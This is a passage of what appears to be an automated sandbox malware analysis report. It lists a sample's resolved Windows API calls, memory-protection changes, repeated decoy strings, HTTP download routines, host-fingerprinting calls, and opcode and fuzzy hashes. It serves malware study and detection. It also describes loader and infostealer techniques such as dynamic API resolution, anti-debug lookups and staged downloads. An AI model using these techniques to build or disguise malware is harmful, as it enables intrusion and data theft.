                                      • GetProcAddress.KERNEL32(76210000,01541620), ref: 00AD9CB4
                                      • GetProcAddress.KERNEL32(76210000,01541578), ref: 00AD9CCC
                                      • GetProcAddress.KERNEL32(76210000,015417A0), ref: 00AD9CE5
                                      • GetProcAddress.KERNEL32(76210000,015417B8), ref: 00AD9CFD
                                      • GetProcAddress.KERNEL32(76210000,01535288), ref: 00AD9D15
                                      • GetProcAddress.KERNEL32(76210000,015415F0), ref: 00AD9D2E
                                      • GetProcAddress.KERNEL32(76210000,015417D0), ref: 00AD9D46
                                      • GetProcAddress.KERNEL32(76210000,015350E8), ref: 00AD9D5E
                                      • GetProcAddress.KERNEL32(76210000,01541608), ref: 00AD9D77
                                      • GetProcAddress.KERNEL32(76210000,015415A8), ref: 00AD9D8F
                                      • GetProcAddress.KERNEL32(76210000,015352C8), ref: 00AD9DA7
                                      • GetProcAddress.KERNEL32(76210000,015417E8), ref: 00AD9DC0
                                      • GetProcAddress.KERNEL32(76210000,015350A8), ref: 00AD9DD8
                                      • LoadLibraryA.KERNEL32(015418A8,?,00AD6CA0), ref: 00AD9DEA
                                      • LoadLibraryA.KERNEL32(01541800,?,00AD6CA0), ref: 00AD9DFB
                                      • LoadLibraryA.KERNEL32(01541818,?,00AD6CA0), ref: 00AD9E0D
                                      • LoadLibraryA.KERNEL32(01541830,?,00AD6CA0), ref: 00AD9E1F
                                      • LoadLibraryA.KERNEL32(01541860,?,00AD6CA0), ref: 00AD9E30
                                      • GetProcAddress.KERNEL32(75B30000,01541878), ref: 00AD9E52
                                      • GetProcAddress.KERNEL32(751E0000,01541890), ref: 00AD9E73
                                      • GetProcAddress.KERNEL32(751E0000,01541848), ref: 00AD9E8B
                                      • GetProcAddress.KERNEL32(76910000,01548D10), ref: 00AD9EAD
                                      • GetProcAddress.KERNEL32(75670000,01535108), ref: 00AD9ECE
                                      • GetProcAddress.KERNEL32(77310000,01548A88), ref: 00AD9EEF
                                      • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00AD9F06
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00AD9EFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: 10ecc28808ca14c44160a2d07e3ab88860d408d195343c1fc6db4e28e8af52ed
                                      • Instruction ID: 101140edaec50780b0268f43a92999637e44ae1fa3e7883f7af06d17abbe9290
                                      • Opcode Fuzzy Hash: 10ecc28808ca14c44160a2d07e3ab88860d408d195343c1fc6db4e28e8af52ed
                                      • Instruction Fuzzy Hash: F8A1ECB5638300AFC344DFA9ED889567BB9AB4E705B10961BB90AD3374D7349940CF78

                                      Control-flow Graph

                                      control_flow_graph 764 ac4610-ac46e5 RtlAllocateHeap 781 ac46f0-ac46f6 764->781 782 ac46fc-ac479a 781->782 783 ac479f-ac47f9 VirtualProtect 781->783 782->781
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AC465E
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00AC47EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4693
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC476E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC471D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC467D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46D3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4688
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4667
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4707
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46FC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46B2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC47AA
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC47C0
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4779
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC478F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4763
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC47CB
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4672
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46C8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC47B5
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC479F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4712
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4728
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4784
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46A7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46BD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4643
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in 
the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: 208ead300b7c8d289108f5df4bc64cc23f3a9b0fc5b3b0d11fbaca04c379019d
                                      • Instruction ID: 41eafd1afeaa236b98df30502c47cc8974d017973da999b5f55d8cc97ed77c69
                                      • Opcode Fuzzy Hash: 208ead300b7c8d289108f5df4bc64cc23f3a9b0fc5b3b0d11fbaca04c379019d
                                      • Instruction Fuzzy Hash: 7E41F360BC3688FEC62ABBF6DC5DEAF77667F4AF1CF505C44AC2056282DB7059004526

                                      Control-flow Graph

                                      control_flow_graph 1033 ac62d0-ac635b call adaab0 call ac4800 call adaa50 InternetOpenA StrCmpCA 1040 ac635d 1033->1040 1041 ac6364-ac6368 1033->1041 1040->1041 1042 ac636e-ac6392 InternetConnectA 1041->1042 1043 ac6559-ac6575 call adaab0 call adab10 * 2 1041->1043 1044 ac654f-ac6553 InternetCloseHandle 1042->1044 1045 ac6398-ac639c 1042->1045 1061 ac6578-ac657d 1043->1061 1044->1043 1047 ac639e-ac63a8 1045->1047 1048 ac63aa 1045->1048 1050 ac63b4-ac63e2 HttpOpenRequestA 1047->1050 1048->1050 1053 ac63e8-ac63ec 1050->1053 1054 ac6545-ac6549 InternetCloseHandle 1050->1054 1056 ac63ee-ac640f InternetSetOptionA 1053->1056 1057 ac6415-ac6455 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1044 1056->1057 1059 ac647c-ac649b call ad8ad0 1057->1059 1060 ac6457-ac6477 call adaa50 call adab10 * 2 1057->1060 1066 ac649d-ac64a4 1059->1066 1067 ac6519-ac6539 call adaa50 call adab10 * 2 1059->1067 1060->1061 1071 ac64a6-ac64d0 InternetReadFile 1066->1071 1072 ac6517-ac653f InternetCloseHandle 1066->1072 1067->1061 1076 ac64db 1071->1076 1077 ac64d2-ac64d9 1071->1077 1072->1054 1076->1072 1077->1076 1080 ac64dd-ac6515 call adacc0 call adabb0 call adab10 1077->1080 1080->1071
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AC4889
                                        • Part of subcall function 00AC4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AC4899
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • InternetOpenA.WININET(00AE0DFF,00000001,00000000,00000000,00000000), ref: 00AC6331
                                      • StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC6353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AC6385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,0154F530,00000000,00000000,00400100,00000000), ref: 00AC63D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AC640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AC6421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00AC644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AC64BD
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC6549
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC6553
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: 32872349be7888e2a565b48e6ae0398175ab914c59bd1f690f38b5b6d2585c65
                                      • Instruction ID: f4b5b1148a252e0e7d830dd2b8177fb7eee30de2ee2cfd9f09d82d98266753d6
                                      • Opcode Fuzzy Hash: 32872349be7888e2a565b48e6ae0398175ab914c59bd1f690f38b5b6d2585c65
                                      • Instruction Fuzzy Hash: 96713C71A10318ABDB24DFA0CD59FEE7779BB44700F10819AF10AAB294DBB56E84CF51

                                      Control-flow Graph (legend: Executed / Not Executed)
                                      control_flow_graph, entry node 1356 ad7690-ad76da; node and edge listing omitted, the API calls reached from this graph are listed under APIs below
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00AD76D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AD770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7793
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD779A
                                      • wsprintfA.USER32 ref: 00AD77D0
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: 4b555cbebe1bc113a1938c779328073fc5e5cbb1e5c4e3c6c93ea334e6108491
                                      • Instruction ID: d162383cfc882be4d63518ffdae1dd4c3e86eea27a22e22902e7878dedeae822
                                      • Opcode Fuzzy Hash: 4b555cbebe1bc113a1938c779328073fc5e5cbb1e5c4e3c6c93ea334e6108491
                                      • Instruction Fuzzy Hash: D94196B1D043589BDB14DF94DD45BDEB7B8AF08704F10419AF50AA7380E774AA44CFA5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AC11B7), ref: 00AD7A10
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD7A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AD7A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: f060a51157b437881a42e150c94e41a4d328603d3cb3c20f369c57d12e6b7223
                                      • Instruction ID: 7272d806265a1adbd44a96ea948908959aec8a60e557b65e0cbde074d371a30f
                                      • Opcode Fuzzy Hash: f060a51157b437881a42e150c94e41a4d328603d3cb3c20f369c57d12e6b7223
                                      • Instruction Fuzzy Hash: 8CF04FB1958309EBC704DF98DD45BAEBBB8FB05711F10065BF615E2780C77515008BA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: f3d96096a31c9bc1ba1b7eb70aa09216303c11d772468ba8727d9325dbff9aae
                                      • Instruction ID: 23c48ca32627e93b660ff7a55dddb05daeb3e624981846cd19317be5e1c4a9de
                                      • Opcode Fuzzy Hash: f3d96096a31c9bc1ba1b7eb70aa09216303c11d772468ba8727d9325dbff9aae
                                      • Instruction Fuzzy Hash: 66D05E74A0430C9BCB00DFE19949ADDBB78FB08215F00155AD905B2340EA305441CA75

                                      Control-flow Graph (legend: Executed / Not Executed)
                                      control_flow_graph, entry node 633 ad9f20-ad9f2a; node and edge listing omitted, the LoadLibraryA / GetProcAddress calls reached from this graph are listed under APIs below
                                      APIs
                                      • GetProcAddress.KERNEL32(76210000,015350C8), ref: 00AD9F3D
                                      • GetProcAddress.KERNEL32(76210000,01534FC8), ref: 00AD9F55
                                      • GetProcAddress.KERNEL32(76210000,01548FB0), ref: 00AD9F6E
                                      • GetProcAddress.KERNEL32(76210000,01549058), ref: 00AD9F86
                                      • GetProcAddress.KERNEL32(76210000,01549010), ref: 00AD9F9E
                                      • GetProcAddress.KERNEL32(76210000,0154DC28), ref: 00AD9FB7
                                      • GetProcAddress.KERNEL32(76210000,0153A658), ref: 00AD9FCF
                                      • GetProcAddress.KERNEL32(76210000,0154DB98), ref: 00AD9FE7
                                      • GetProcAddress.KERNEL32(76210000,0154DC10), ref: 00ADA000
                                      • GetProcAddress.KERNEL32(76210000,0154DC58), ref: 00ADA018
                                      • GetProcAddress.KERNEL32(76210000,0154DAD8), ref: 00ADA030
                                      • GetProcAddress.KERNEL32(76210000,015351C8), ref: 00ADA049
                                      • GetProcAddress.KERNEL32(76210000,01535188), ref: 00ADA061
                                      • GetProcAddress.KERNEL32(76210000,01534FE8), ref: 00ADA079
                                      • GetProcAddress.KERNEL32(76210000,01535008), ref: 00ADA092
                                      • GetProcAddress.KERNEL32(76210000,0154DAF0), ref: 00ADA0AA
                                      • GetProcAddress.KERNEL32(76210000,0154DD60), ref: 00ADA0C2
                                      • GetProcAddress.KERNEL32(76210000,0153A928), ref: 00ADA0DB
                                      • GetProcAddress.KERNEL32(76210000,01535028), ref: 00ADA0F3
                                      • GetProcAddress.KERNEL32(76210000,0154DC88), ref: 00ADA10B
                                      • GetProcAddress.KERNEL32(76210000,0154DC40), ref: 00ADA124
                                      • GetProcAddress.KERNEL32(76210000,0154DBB0), ref: 00ADA13C
                                      • GetProcAddress.KERNEL32(76210000,0154DD78), ref: 00ADA154
                                      • GetProcAddress.KERNEL32(76210000,01535048), ref: 00ADA16D
                                      • GetProcAddress.KERNEL32(76210000,0154DC70), ref: 00ADA185
                                      • GetProcAddress.KERNEL32(76210000,0154DD90), ref: 00ADA19D
                                      • GetProcAddress.KERNEL32(76210000,0154DB80), ref: 00ADA1B6
                                      • GetProcAddress.KERNEL32(76210000,0154DDA8), ref: 00ADA1CE
                                      • GetProcAddress.KERNEL32(76210000,0154DAC0), ref: 00ADA1E6
                                      • GetProcAddress.KERNEL32(76210000,0154DCA0), ref: 00ADA1FF
                                      • GetProcAddress.KERNEL32(76210000,0154DB08), ref: 00ADA217
                                      • GetProcAddress.KERNEL32(76210000,0154DCD0), ref: 00ADA22F
                                      • GetProcAddress.KERNEL32(76210000,0154DB68), ref: 00ADA248
                                      • GetProcAddress.KERNEL32(76210000,0153FE38), ref: 00ADA260
                                      • GetProcAddress.KERNEL32(76210000,0154DCB8), ref: 00ADA278
                                      • GetProcAddress.KERNEL32(76210000,0154DB20), ref: 00ADA291
                                      • GetProcAddress.KERNEL32(76210000,01535148), ref: 00ADA2A9
                                      • GetProcAddress.KERNEL32(76210000,0154DB38), ref: 00ADA2C1
                                      • GetProcAddress.KERNEL32(76210000,01535168), ref: 00ADA2DA
                                      • GetProcAddress.KERNEL32(76210000,0154DB50), ref: 00ADA2F2
                                      • GetProcAddress.KERNEL32(76210000,0154DBC8), ref: 00ADA30A
                                      • GetProcAddress.KERNEL32(76210000,01535068), ref: 00ADA323
                                      • GetProcAddress.KERNEL32(76210000,015351E8), ref: 00ADA33B
                                      • LoadLibraryA.KERNEL32(0154DBE0,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA34D
                                      • LoadLibraryA.KERNEL32(0154DBF8,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA35E
                                      • LoadLibraryA.KERNEL32(0154DCE8,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA370
                                      • LoadLibraryA.KERNEL32(0154DD00,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA382
                                      • LoadLibraryA.KERNEL32(0154DD18,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA393
                                      • LoadLibraryA.KERNEL32(0154DD30,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA3A5
                                      • LoadLibraryA.KERNEL32(0154DD48,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA3B7
                                      • LoadLibraryA.KERNEL32(0154DE50,?,00AD5EF3,00AE0AEB,?,?,?,?,?,?,?,?,?,?,00AE0AEA,00AE0AE7), ref: 00ADA3C8
